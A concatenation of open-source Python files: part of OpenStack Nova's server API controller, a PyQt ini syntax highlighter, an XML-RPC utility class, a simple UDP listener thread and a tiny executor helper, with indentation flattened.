# TODO(mriedem): Move to ObjectListBase.__init__ for empty lists.
instance_list = instance_obj.InstanceList(objects=[])
if is_detail:
instance_list.fill_faults()
response = self._view_builder.detail(req, instance_list)
else:
response = self._view_builder.index(req, instance_list)
req.cache_db_instances(instance_list)
return response
def _get_server(self, context, req, instance_uuid):
"""Utility function for looking up an instance by uuid."""
try:
instance = self.compute_api.get(context, instance_uuid,
want_objects=True)
except exception.NotFound:
msg = _("Instance could not be found")
raise exc.HTTPNotFound(explanation=msg)
req.cache_db_instance(instance)
return instance
def _check_string_length(self, value, name, max_length=None):
try:
if isinstance(value, six.string_types):
value = value.strip()
utils.check_string_length(value, name, min_length=1,
max_length=max_length)
except exception.InvalidInput as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
def _validate_server_name(self, value):
self._check_string_length(value, 'Server name', max_length=255)
def _get_injected_files(self, personality):
"""Create a list of injected files from the personality attribute.
At this time, injected_files must be formatted as a list of
(file_path, file_content) pairs for compatibility with the
underlying compute service.
"""
injected_files = []
for item in personality:
try:
path = item['path']
contents = item['contents']
except KeyError as key:
expl = _('Bad personality format: missing %s') % key
raise exc.HTTPBadRequest(explanation=expl)
except TypeError:
expl = _('Bad personality format')
raise exc.HTTPBadRequest(explanation=expl)
if self._decode_base64(contents) is None:
expl = _('Personality content for %s cannot be decoded') % path
raise exc.HTTPBadRequest(explanation=expl)
injected_files.append((path, contents))
return injected_files
def _get_requested_networks(self, requested_networks):
"""Create a list of requested networks from the networks attribute."""
networks = []
for network in requested_networks:
try:
port_id = network.get('port', None)
if port_id:
network_uuid = None
if not utils.is_neutron():
# port parameter is only for neutron v2.0
msg = _("Unknown argument : port")
raise exc.HTTPBadRequest(explanation=msg)
if not uuidutils.is_uuid_like(port_id):
msg = _("Bad port format: port uuid is "
"not in proper format "
"(%s)") % port_id
raise exc.HTTPBadRequest(explanation=msg)
else:
network_uuid = network['uuid']
if not port_id and not uuidutils.is_uuid_like(network_uuid):
br_uuid = network_uuid.split('-', 1)[-1]
if not uuidutils.is_uuid_like(br_uuid):
msg = _("Bad networks format: network uuid is "
"not in proper format "
"(%s)") % network_uuid
raise exc.HTTPBadRequest(explanation=msg)
#fixed IP address is optional
#if the fixed IP address is not provided then
#it will use one of the available IP address from the network
address = network.get('fixed_ip', None)
if address is not None and not utils.is_valid_ip_address(
address):
msg = _("Invalid fixed IP address (%s)") % address
raise exc.HTTPBadRequest(explanation=msg)
# For neutronv2, requested_networks
# should be tuple of (network_uuid, fixed_ip, port_id)
if utils.is_neutron():
networks.append((network_uuid, address, port_id))
else:
# check if the network id is already present in the list,
# we don't want duplicate networks to be passed
# at the boot time
for id, ip in networks:
if id == network_uuid:
expl = (_("Duplicate networks"
" (%s) are not allowed") %
network_uuid)
raise exc.HTTPBadRequest(explanation=expl)
networks.append((network_uuid, address))
except KeyError as key:
expl = _('Bad network format: missing %s') % key
raise exc.HTTPBadRequest(explanation=expl)
except TypeError:
expl = _('Bad networks format')
raise exc.HTTPBadRequest(explanation=expl)
return networks
# NOTE(vish): Without this regex, b64decode will happily
# ignore illegal bytes in the base64 encoded
# data.
B64_REGEX = re.compile('^(?:[A-Za-z0-9+\/]{4})*'
'(?:[A-Za-z0-9+\/]{2}=='
'|[A-Za-z0-9+\/]{3}=)?$')
def _decode_base64(self, data):
data = re.sub(r'\s', '', data)
if not self.B64_REGEX.match(data):
return None
try:
return base64.b64decode(data)
except TypeError:
return None
def _validate_user_data(self, user_data):
"""Check if the user_data is encoded properly."""
if not user_data:
return
if self._decode_base64(user_data) is None:
expl = _('Userdata content cannot be decoded')
raise exc.HTTPBadRequest(explanation=expl)
def _validate_access_ipv4(self, address):
if not utils.is_valid_ipv4(address):
expl = _('accessIPv4 is not proper IPv4 format')
raise exc.HTTPBadRequest(explanation=expl)
def _validate_access_ipv6(self, address):
if not utils.is_valid_ipv6(address):
expl = _('accessIPv6 is not proper IPv6 format')
raise exc.HTTPBadRequest(explanation=expl)
@wsgi.serializers(xml=ServerTemplate)
def show(self, req, id):
"""Returns server details by server id."""
try:
context = req.environ['nova.context']
instance = self.compute_api.get(context, id,
want_objects=True)
req.cache_db_instance(instance)
return self._view_builder.show(req, instance)
except exception.NotFound:
msg = _("Instance could not be found")
raise exc.HTTPNotFound(explanation=msg)
@wsgi.response(202)
@wsgi.serializers(xml=FullServerTemplate)
@wsgi.deserializers(xml=CreateDeserializer)
def create(self, req, body):
"""Creates a new server for a given user."""
if not self.is_valid_body(body, 'server'):
raise exc.HTTPUnprocessableEntity()
context = req.environ['nova.context']
server_dict = body['server']
password = self._get_server_admin_password(server_dict)
if 'name' not in server_dict:
msg = _("Server name is not defined")
raise exc.HTTPBadRequest(explanation=msg)
name = server_dict['name']
self._validate_server_name(name)
name = name.strip()
image_uuid = self._image_from_req_data(body)
personality = server_dict.get('personality')
config_drive = None
if self.ext_mgr.is_loaded('os-config-drive'):
config_drive = server_dict.get('config_drive')
injected_files = []
if personality:
injected_files = self._get_injected_files(personality)
sg_names = []
if self.ext_mgr.is_loaded('os-security-groups'):
security_groups = server_dict.get('security_groups')
if security_groups is not None:
sg_names = [sg['name'] for sg in security_groups
if sg.get('name')]
if not sg_names:
sg_names.append('default')
sg_names = list(set(sg_names))
requested_networks = None
if (self.ext_mgr.is_loaded('os-networks')
or utils.is_neutron()):
requested_networks = server_dict.get('networks')
if requested_networks is not None:
if not isinstance(requested_networks, list):
expl = _('Bad networks format')
raise exc.HTTPBadRequest(explanation=expl)
requested_networks = self._get_requested_networks(
requested_networks)
(access_ip_v4, ) = server_dict.get('accessIPv4'),
if access_ip_v4 is not None:
self._validate_access_ipv4(access_ip_v4)
(access_ip_v6, ) = server_dict.get('accessIPv6'),
if access_ip_v6 is not None:
self._validate_access_ipv6(access_ip_v6)
try:
flavor_id = self._flavor_id_from_req_data(body)
except ValueError as error:
msg = _("Invalid flavorRef provided.")
raise exc.HTTPBadRequest(explanation=msg)
# optional openstack extensions:
key_name = None
if self.ext_mgr.is_loaded('os-keypairs'):
key_name = server_dict.get('key_name')
user_data = None
if self.ext_mgr.is_loaded('os-user-data'):
user_data = server_dict.get('user_data')
self._validate_user_data(user_data)
availability_zone = None
if self.ext_mgr.is_loaded('os-availability-zone'):
availability_zone = server_dict.get('availability_zone')
block_device_mapping = None
block_device_mapping_v2 = None
legacy_bdm = True
if self.ext_mgr.is_loaded('os-volumes'):
block_device_mapping = server_dict.get('block_device_mapping', [])
for bdm in block_device_mapping:
try:
block_device.validate_device_name(bdm.get("device_name"))
block_device.validate_and_default_volume_size(bdm)
except exception.InvalidBDMFormat as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
if 'delete_on_termination' in bdm:
bdm['delete_on_termination'] = strutils.bool_from_string(
bdm['delete_on_termination'])
if self.ext_mgr.is_loaded('os-block-device-mapping-v2-boot'):
# Consider the new data format for block device mapping
block_device_mapping_v2 = server_dict.get(
'block_device_mapping_v2', [])
# NOTE (ndipanov): Disable usage of both legacy and new
# block device format in the same request
if block_device_mapping and block_device_mapping_v2:
expl = _('Using different block_device_mapping syntaxes '
'is not allowed in the same request.')
raise exc.HTTPBadRequest(explanation=expl)
# Assume legacy format
legacy_bdm = not bool(block_device_mapping_v2)
try:
block_device_mapping_v2 = [
block_device.BlockDeviceDict.from_api(bdm_dict)
for bdm_dict in block_device_mapping_v2]
except exception.InvalidBDMFormat as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
block_device_mapping = (block_device_mapping or
block_device_mapping_v2)
ret_resv_id = False
# min_count and max_count are optional. If they exist, they may come
# in as strings. Verify that they are valid integers and > 0.
# Also, we want to default 'min_count' to 1, and default
# 'max_count' to be 'min_count'.
min_count = 1
max_count = 1
if self.ext_mgr.is_loaded('os-multiple-create'):
ret_resv_id = server_dict.get('return_reservation_id', False)
min_count = server_dict.get('min_count', 1)
max_count = server_dict.get('max_count', min_count)
try:
min_count = utils.validate_integer(
min_count, "min_count", min_value=1)
max_count = utils.validate_integer(
max_count, "max_count", min_value=1)
except exception.InvalidInput as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
if min_count > max_count:
msg = _('min_count must be <= max_count')
raise exc.HTTPBadRequest(explanation=msg)
auto_disk_config = False
if self.ext_mgr.is_loaded('OS-DCF'):
auto_disk_config = server_dict.get('auto_disk_config')
scheduler_hints = {}
if self.ext_mgr.is_loaded('OS-SCH-HNT'):
scheduler_hints = server_dict.get('scheduler_hints', {})
try:
_get_inst_type = flavors.get_flavor_by_flavor_id
inst_type = _get_inst_type(flavor_id, ctxt=context,
read_deleted="no")
(instances, resv_id) = self.compute_api.create(context,
inst_type,
image_uuid,
display_name=name,
display_description=name,
key_name=key_name,
metadata=server_dict.get('metadata', {}),
access_ip_v4=access_ip_v4,
access_ip_v6=access_ip_v6,
injected_files=injected_files,
admin_password=password,
min_count=min_count,
max_count=max_count,
requested_networks=requested_networks,
security_group=sg_names,
user_data=user_data,
availability_zone=availability_zone,
config_drive=config_drive,
block_device_mapping=block_device_mapping,
auto_disk_config=auto_disk_config,
scheduler_hints=scheduler_hints,
legacy_bdm=legacy_bdm)
except (exception.QuotaError,
exception.PortLimitExceeded) as error:
raise exc.HTTPRequestEntityTooLarge(
explanation=error.format_message(),
headers={'Retry-After': 0})
except exception.InvalidMetadataSize as error:
raise exc.HTTPRequestEntityTooLarge(
explanation=error.format_message())
except exception.ImageNotFound as error:
msg = _("Can not find requested image")
raise exc.HTTPBadRequest(explanation=msg)
except exception.FlavorNotFound as error:
msg = _("Invalid flavorRef provided.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.KeypairNotFound as error:
msg = _("Invalid key_name provided.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.ConfigDriveInvalidValue:
msg = _("Invalid config_drive provided.")
raise exc.HTTPBadRequest(explanation=msg)
except messaging.RemoteError as err:
msg = "%(err_type)s: %(err_msg)s" % {'err_type': err.exc_type,
'err_msg': err.value}
raise exc.HTTPBadRequest(explanation=msg)
except UnicodeDecodeError as error:
msg = "UnicodeError: %s" % unicode(error)
raise exc.HTTPBadRequest(explanation=msg)
except (exception.ImageNotActive,
exception.FlavorDiskTooSmall,
exception.FlavorMemoryTooSmall,
exception.InvalidMetadata,
exception.InvalidRequest,
exception.MultiplePortsNotApplicable,
exception.NetworkNotFound,
exception.PortNotFound,
exception.SecurityGroupNotFound,
exception.InvalidBDM,
exception.PortRequiresFixedIP,
exception.NetworkRequiresSubnet,
exception.InstanceUserDataMalformed) as error:
raise exc.HTTPBadRequest(explanation=error.format_message())
except (exception.PortInUse,
exception.NoUniqueMatch) as error:
raise exc.HTTPConflict(explanation=error.format_message())
# If the caller wanted a reservation_id, return it
if ret_resv_id:
return wsgi.ResponseObject({'reservation_id': resv_id},
xml=ServerMultipleCreateTemplate)
req.cache_db_instances(instances)
server = self._view_builder.create(req, instances[0])
if CONF.enable_instance_password:
server['server']['adminPass'] = password
robj = wsgi.ResponseObject(server)
return self._add_location(robj)
def _delete(self, context, req, instance_uuid):
instance = self._get_server(context, req, instance_uuid)
if CONF.reclaim_instance_interval:
try:
self.compute_api.soft_delete(context, instance)
except exception.InstanceInvalidState:
# Note(yufang521247): instance which has never been active
# is not allowed to be soft_deleted. Thus we have to call
# delete() to clean up the instance.
self.compute_api.delete(context, instance)
else:
self.compute_api.delete(context, instance)
@wsgi.serializers(xml=ServerTemplate)
def update(self, req, id, body):
"""Update server then pass on to version-specific controller."""
if not self.is_valid_body(body, 'server'):
raise exc.HTTPUnprocessableEntity()
ctxt = req.environ['nova.context']
update_dict = {}
is_rename = False
if 'name' in body['server']:
name = body['server']['name']
self._validate_server_name(name)
update_dict['display_name'] = name.strip()
is_rename = True
if 'accessIPv4' in body['server']:
access_ipv4 = body['server']['accessIPv4']
if access_ipv4:
self._validate_access_ipv4(access_ipv4)
update_dict['access_ip_v4'] = (
access_ipv4 and access_ipv4.strip() or None)
if 'accessIPv6' in body['server']:
access_ipv6 = body['server']['accessIPv6']
if access_ipv6:
self._validate_access_ipv6(access_ipv6)
update_dict['access_ip_v6'] = (
access_ipv6 and access_ipv6.strip() or None)
if 'auto_disk_config' in body['server']:
auto_disk_config = strutils.bool_from_string(
body['server']['auto_disk_config'])
update_dict['auto_disk_config'] = auto_disk_config
if 'hostId' in body['server']:
msg = _("HostId cannot be updated.")
raise exc.HTTPBadRequest(explanation=msg)
if 'personality' in body['server']:
msg = _("Personality cannot be updated.")
raise exc.HTTPBadRequest(explanation=msg)
try:
instance = self.compute_api.get(ctxt, id,
want_objects=True)
req.cache_db_instance(instance)
policy.enforce(ctxt, 'compute:update', instance)
instance.update(update_dict)
instance.save()
if is_rename is True:
self.compute_api.rename_virtualmachine(ctxt, instance)
except exception.NotFound:
msg = _("Instance could not be found")
raise exc.HTTPNotFound(explanation=msg)
return self._view_builder.show(req, instance)
@wsgi.response(202)
@wsgi.serializers(xml=FullServerTemplate)
@wsgi.deserializers(xml=ActionDeserializer)
@wsgi.action('confirmResize')
def _action_confirm_resize(self, req, id, body):
context = req.environ['nova.context']
instance = self._get_server(context, req, id)
try:
self.compute_api.confirm_resize(context, instance)
except exception.MigrationNotFound:
msg = _("Instance has not been resized.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'confirmResize')
return exc.HTTPNoContent()
@wsgi.response(202)
@wsgi.serializers(xml=FullServerTemplate)
@wsgi.deserializers(xml=ActionDeserializer)
@wsgi.action('revertResize')
def _action_revert_resize(self, req, id, body):
context = req.environ['nova.context']
instance = self._get_server(context, req, id)
try:
self.compute_api.revert_resize(context, instance)
except exception.MigrationNotFound:
msg = _("Instance has not been resized.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.FlavorNotFound:
msg = _("Flavor used by the instance could not be found.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'revertResize')
return webob.Response(status_int=202)
@wsgi.response(202)
@wsgi.serializers(xml=FullServerTemplate)
@wsgi.deserializers(xml=ActionDeserializer)
@wsgi.action('reboot')
def _action_reboot(self, req, id, body):
if 'reboot' in body and 'type' in body['reboot']:
if not isinstance(body['reboot']['type'], six.string_types):
msg = _("Argument 'type' for reboot must be a string")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
valid_reboot_types = ['HARD', 'SOFT']
reboot_type = body['reboot']['type'].upper()
if reboot_type not in valid_reboot_types:
msg = _("Argument 'type' for reboot is not HARD or SOFT")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
else:
msg = _("Missing argument 'type' for reboot")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
context = req.environ['nova.context']
instance = self._get_server(context, req, id)
try:
self.compute_api.reboot(context, instance, reboot_type)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'reboot')
return webob.Response(status_int=202)
def _resize(self, req, instance_id, flavor_id, **kwargs):
"""Begin the resize process with given instance/flavor."""
context = req.environ["nova.context"]
instance = self._get_server(context, req, instance_id)
try:
self.compute_api.resize(context, instance, flavor_id, **kwargs)
except exception.QuotaError as error:
raise exc.HTTPRequestEntityTooLarge(
explanation=error.format_message(),
headers={'Retry-After': 0})
except exception.FlavorNotFound:
msg = _("Unable to locate requested flavor.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.CannotResizeToSameFlavor:
msg = _("Resize requires a flavor change.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'resize')
except exception.ImageNotAuthorized:
msg = _("You are not authorized to access the image "
"the instance was started with.")
raise exc.HTTPUnauthorized(explanation=msg)
except exception.ImageNotFound:
msg = _("Image that the instance was started "
"with could not be found.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.Invalid:
msg = _("Invalid instance image.")
raise exc.HTTPBadRequest(explanation=msg)
return webob.Response(status_int=202)
@wsgi.response(204)
def delete(self, req, id):
"""Destroys a server."""
try:
self._delete(req.environ['nova.context'], req, id)
except exception.NotFound:
msg = _("Instance could not be found")
raise exc.HTTPNotFound(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'delete')
def _image_ref_from_req_data(self, data):
try:
return unicode(data['server']['imageRef'])
except (TypeError, KeyError):
msg = _("Missing imageRef attribute")
raise exc.HTTPBadRequest(explanation=msg)
def _image_uuid_from_href(self, image_href):
# If the image href was generated by nova api, strip image_href
# down to an id and use the default glance connection params
image_uuid = image_href.split('/').pop()
if not uuidutils.is_uuid_like(image_uuid):
msg = _("Invalid imageRef provided.")
raise exc.HTTPBadRequest(explanation=msg)
return image_uuid
def _image_from_req_data(self, data):
"""Get image data from the request or raise appropriate
exceptions
If no image is supplied - checks to see if there is
block devices set and proper extesions loaded.
"""
image_ref = data['server'].get('imageRef')
bdm = data['server'].get('block_device_mapping')
bdm_v2 = data['server'].get('block_device_mapping_v2')
if (not image_ref and (
(bdm and self.ext_mgr.is_loaded('os-volumes')) or
(bdm_v2 and
self.ext_mgr.is_loaded('os-block-device-mapping-v2-boot')))):
return ''
else:
image_href = self._image_ref_from_req_data(data)
image_uuid = self._image_uuid_from_href(image_href)
return image_uuid
def _flavor_id_from_req_data(self, data):
try:
flavor_ref = data['server']['flavorRef']
except (TypeError, KeyError):
msg = _("Missing flavorRef attribute")
raise exc.HTTPBadRequest(explanation=msg)
return common.get_id_from_href(flavor_ref)
@wsgi.response(202)
@wsgi.serializers(xml=FullServerTemplate)
@wsgi.deserializers(xml=ActionDeserializer)
@wsgi.action('changePassword')
def _action_change_password(self, req, id, body):
context = req.environ['nova.context']
if ('changePassword' not in body
or 'adminPass' not in body['changePassword']):
msg = _("No adminPass was specified")
raise exc.HTTPBadRequest(explanation=msg)
password = self._get_server_admin_password(body['changePassword'])
server = self._get_server(context, req, id)
try:
self.compute_api.set_admin_password(context, server, password)
except NotImplementedError:
msg = _("Unable to set password on instance")
raise exc.HTTPNotImplemented(explanation=msg)
return webob.Response(status_int=202)
def _validate_metadata(self, metadata):
"""Ensure that we can work with the metadata given."""
try:
metadata.iteritems()
except AttributeError:
msg = _("Unable to parse metadata key/value pairs.")
LOG.debug(msg)
raise exc.HTTPBadRequest(explanation=msg)
@wsgi.response(202)
@wsgi.serializers(xml=FullServerTemplate)
@wsgi.deserializers(xml=ActionDeserializer)
@wsgi.action('resize')
def _action_resize(self, req, id, body):
"""Resizes a given instance to the flavor size requested."""
try:
flavor_ref = str(body["resize"]["flavorRef"])
if not flavor_ref:
msg = _("Resize request has invalid 'flavorRef' attribute.")
raise exc.HTTPBadRequest(explanation=msg)
except (KeyError, TypeError):
msg = _("Resize requests require 'flavorRef' attribute.")
raise exc.HTTPBadRequest(explanation=msg)
kwargs = {}
if 'auto_disk_config' in body['resize']:
kwargs['auto_disk_config'] = body['resize']['auto_disk_config']
return self._resize(req, id, flavor_ref, **kwargs)
@wsgi.response(202)
@wsgi.serializers(xml=FullServerTemplate)
@wsgi.deserializers(xml=ActionDeserializer)
@wsgi.action('rebuild')
def _action_rebuild(self, req, id, body):
"""Rebuild an instance with the given attributes."""
body = body['rebuild']
try:
image_href = body["imageRef"]
except (KeyError, TypeError):
msg = _("Could not parse imageRef from request.")
raise exc.HTTPBadRequest(explanation=msg)
image_href = self._image_uuid_from_href(image_href)
password = self._get_server_admin_password(body)
context = req.environ['nova.context']
instance = self._get_server(context, req, id)
attr_map = {
'personality': 'files_to_inject',
'name': 'display_name',
'accessIPv4': 'access_ip_v4',
'accessIPv6': 'access_ip_v6',
'metadata': 'metadata',
'auto_disk_config': 'auto_disk_config',
}
kwargs = {}
# take the preserve_ephemeral value into account only when the
# corresponding extension is active
if (self.ext_mgr.is_loaded('os-preserve-ephemeral-rebuild')
and 'preserve_ephemeral' in body):
kwargs['preserve_ephemeral'] = strutils.bool_from_string(
body['preserve_ephemeral'], strict=True)
if 'accessIPv4' in body:
self._validate_access_ipv4(body['accessIPv4'])
if 'accessIPv6' in body:
self._validate_access_ipv6(body['accessIPv6'])
if 'name' in body:
self._validate_server_name(body['name'])
for request_attribute, instance_attribute in attr_map.items():
try:
kwargs[instance_attribute] = body[request_attribute]
except (KeyError, TypeError):
pass
self._validate_metadata(kwargs.get('metadata', {}))
if 'files_to_inject' in kwargs:
personality = kwargs.pop('files_to_inject')
files_to_inject = self._get_injected_files(personality)
else:
files_to_inject = None
try:
self.compute_api.rebuild(context,
instance,
image_href,
password,
files_to_inject=files_to_inject,
**kwargs)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'rebuild')
except exception.InstanceNotFound:
msg = _("Instance could not be found")
raise exc.HTTPNotFound(explanation=msg)
except exception.InvalidMetadataSize as error:
raise exc.HTTPRequestEntityTooLarge(
explanation=error.format_message())
except exception.ImageNotFound:
msg = _("Cannot find image for rebuild")
raise exc.HTTPBadRequest(explanation=msg)
except (exception.ImageNotActive,
exception.FlavorDiskTooSmall,
exception.FlavorMemoryTooSmall,
exception.InvalidMetadata) as error:
raise exc.HTTPBadRequest(explanation=error.format_message())
instance = self._get_server(context, req, id)
view = self._view_builder.show(req, instance)
# Add on the adminPass attribute since the view doesn't do it
# unless instance passwords are disabled
if CONF.enable_instance_password:
view['server']['adminPass'] = password
robj = wsgi.ResponseObject(view)
return self._add_location(robj)
@wsgi.response(202)
@wsgi.serializers(xml=FullServerTemplate)
@wsgi.deserializers(xml=ActionDeserializer)
@wsgi.action('createImage')
@common.check_snapshots_enabled
def _action_create_image(self, req, id, body):
"""Snapshot a server instance."""
context = req.environ['nova.context']
entity = body.get("createImage", {})
image_name = entity.get("name")
if not image_name:
msg = _("createImage entity requires name attribute")
raise exc.HTTPBadRequest(explanation=msg)
props = {}
metadata = entity.get('metadata', {})
common.check_img_metadata_properties_quota(context, metadata)
try:
props.update(metadata)
except ValueError:
msg = _("Invalid metadata")
raise exc.HTTPBadRequest(explanation=msg)
instance = self._get_server(context, req, id)
bdms = block_device_obj.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
try:
if self.compute_api.is_volume_backed_instance(context, instance,
bdms):
img = instance['image_ref']
if not img:
props = bdms.root_metadata(
context, self.compute_api.image_service,
self.compute_api.volume_api)
image_meta = {'properties': props}
else:
src_image = self.compute_api.image_service.\
show(context, img)
image_meta = dict(src_image)
image = self.compute_api.snapshot_volume_backed(
context,
instance,
image_meta,
image_name,
extra_properties=props)
else:
image = self.compute_api.snapshot(context,
instance,
image_name,
extra_properties=props)
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'createImage')
except exception.Invalid as err:
raise exc.HTTPBadRequest(explanation=err.format_message())
# build location of newly-created image entity
image_id = str(image['id'])
image_ref = os.path.join(req.application_url,
context.project_id,
'images',
image_id)
resp = webob.Response(status_int=202)
resp.headers['Location'] = image_ref
return resp
def _get_server_admin_password(self, server):
"""Determine the admin password for a server on creation."""
try:
password = server['adminPass']
self._validate_admin_password(password)
except KeyError:
password = utils.generate_password()
except ValueError:
raise exc.HTTPBadRequest(explanation=_("Invalid adminPass"))
return password
def _validate_admin_password(self, password):
if not isinstance(password, six.string_types):
raise ValueError()
def _get_server_search_options(self):
"""Return server search options allowed by non-admin."""
return ('reservation_id', 'name', 'status', 'image', 'flavor',
'ip', 'changes-since', 'all_tenants')
def create_resource(ext_mgr):
return wsgi.Resource(Controller(ext_mgr))
def remove_invalid_options(context, search_options, allowed_search_options):
"""Remove search options that are not valid for non-admin API/context."""
if context.is_admin:
# Allow all options
return
# Otherwise, strip out all unknown options
unknown_options = [opt for opt in search_options
if opt not in allowed_search_options]
LOG.debug(_("Removing options '%s' from query"),
", ".join(unknown_options))
for opt in unknown_options:
search_options.pop(opt, None)
| shhui/nova | nova/api/openstack/compute/servers.py | Python | apache-2.0 | 61,915 |
# -*- coding: utf-8 -*-
from __future__ import (unicode_literals, division,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2015, Jim Miller'
__docformat__ = 'restructuredtext en'
import re
try:
from PyQt5.Qt import (Qt, QSyntaxHighlighter, QTextCharFormat, QBrush)
except ImportError as e:
from PyQt4.Qt import (Qt, QSyntaxHighlighter, QTextCharFormat, QBrush)
class BasicIniHighlighter(QSyntaxHighlighter):
'''
QSyntaxHighlighter class for use with QTextEdit for highlighting
ini config files.
I looked high and low to find a highlighter for the basic ini config
format, so I'm leaving this in the project even though I'm not
using it.  A minimal usage sketch is included at the end of this module.
'''
def __init__( self, parent, theme ):
QSyntaxHighlighter.__init__( self, parent )
self.parent = parent
self.highlightingRules = []
# keyword
self.highlightingRules.append( HighlightingRule( r"^[^:=\s][^:=]*[:=]",
Qt.blue,
Qt.SolidPattern ) )
# section
self.highlightingRules.append( HighlightingRule( r"^\[[^\]]+\]",
Qt.darkBlue,
Qt.SolidPattern ) )
# comment
self.highlightingRules.append( HighlightingRule( r"#[^\n]*" ,
Qt.darkYellow,
Qt.SolidPattern ) )
def highlightBlock( self, text ):
for rule in self.highlightingRules:
for match in rule.pattern.finditer(text):
self.setFormat( match.start(), match.end()-match.start(), rule.highlight )
self.setCurrentBlockState( 0 )
class HighlightingRule():
def __init__( self, pattern, color, style ):
if isinstance(pattern,basestring):
self.pattern = re.compile(pattern)
else:
self.pattern=pattern
charfmt = QTextCharFormat()
brush = QBrush(color, style)
charfmt.setForeground(brush)
self.highlight = charfmt
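# ---------------------------------------------------------------------------
# Minimal usage sketch (not part of the original plugin): the highlighter is
# attached to a QTextEdit's document, as the class docstring above describes.
# The sample ini text is an illustrative assumption, and the sketch assumes a
# Python 2 / calibre-style Qt environment like the rest of this module; the
# second constructor argument (theme) is accepted but unused by __init__.
if __name__ == "__main__":
    try:
        from PyQt5.Qt import QApplication, QTextEdit
    except ImportError:
        from PyQt4.Qt import QApplication, QTextEdit
    app = QApplication([])
    editor = QTextEdit()
    # Keep a reference so the highlighter is not garbage-collected.
    highlighter = BasicIniHighlighter(editor.document(), None)
    editor.setPlainText("[section]\nkey = value\n# a comment line")
    editor.show()
    app.exec_()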
| PlushBeaver/FanFicFare | calibre-plugin/basicinihighlighter.py | Python | gpl-3.0 | 2,295 |
#Boss Ogg - A Music Server
#(c)2003 by Ted Kulp ([email protected])
#This project's homepage is: http://bossogg.wishy.org
#
#This program is free software; you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation; either version 2 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
from boss3.util import Logger
from boss3.util.Session import *
import boss3.xmlrpc.bossxmlrpclib as xmlrpclib
class Util:
"""
Util realm. This will contain basic functions that don't
really fit anywhere else. They can generally have a very low
security level.
util("version"): Returns version information about the running
server.
Parameters:
* None
Returns:
* Struct
* version - string
* name - string
"""
def handleRequest(self, cmd, argstuple):
session = Session()
args = []
for i in argstuple:
args.append(i)
if (session.hasKey('cmdint')):
cmdint = session['cmdint']
if cmd == "version":
return cmdint.util.version()
# vim:ts=8 sw=8 noet
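# ---------------------------------------------------------------------------
# Hypothetical client-side sketch (not part of the original server): how the
# util("version") call documented in Util's docstring might be issued over
# XML-RPC.  The server URL/port and the exposed method name are illustrative
# assumptions; only the returned struct fields (version, name) come from the
# docstring above.
#
#   import xmlrpclib
#   server = xmlrpclib.ServerProxy("http://localhost:8900")
#   info = server.util("version")
#   print "%s %s" % (info["name"], info["version"])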
| tedkulp/bossogg | boss3/xmlrpc/Util.py | Python | gpl-2.0 | 1,506 |
#UDP Class
#UDP Server stuff
import threading
from threading import Thread
import socket
import time
UDPBufferSize = 1024 #UDP Data buffer size in bytes
class UDP(threading.Thread):
"""docstring for UDP"""
def __init__(self, UDPIp, UDPPort, Callback):
threading.Thread.__init__(self)
self.CallbackFunction = Callback
self.UDPIp = UDPIp
self.UDPPort = UDPPort
def init(self):
global Socket
Socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
Socket.bind((self.UDPIp, self.UDPPort))
def run(self): #When thread is started this should be executed
while True:
UDPData, UDPRecvAddress = Socket.recvfrom(UDPBufferSize)
self.CallbackFunction(UDPData)
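# ---------------------------------------------------------------------------
# Minimal usage sketch (not part of the original module): UDP is a thread that
# hands every received datagram to the callback passed to the constructor.
# init() must be called to create and bind the socket before start().  The
# address, port and callback below are illustrative assumptions.
if __name__ == "__main__":
    def print_packet(data):
        print("Received %d bytes: %r" % (len(data), data))
    server = UDP("0.0.0.0", 9000, print_packet)
    server.init()   # create and bind the listening socket
    server.start()  # run() loops forever, invoking the callback per datagram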
| snowdenator/EarlHomeAutomation | GenV/Software/Server/Refactored Code/udp.py | Python | mit | 683 |
from . import current
def use_executor(executor):
current.process = executor
def current_executor():
return current.process
| ducksboard/libsaas | libsaas/executors/base.py | Python | mit | 136 |
#
# Copyright © 2012 - 2021 Michal Čihař <[email protected]>
#
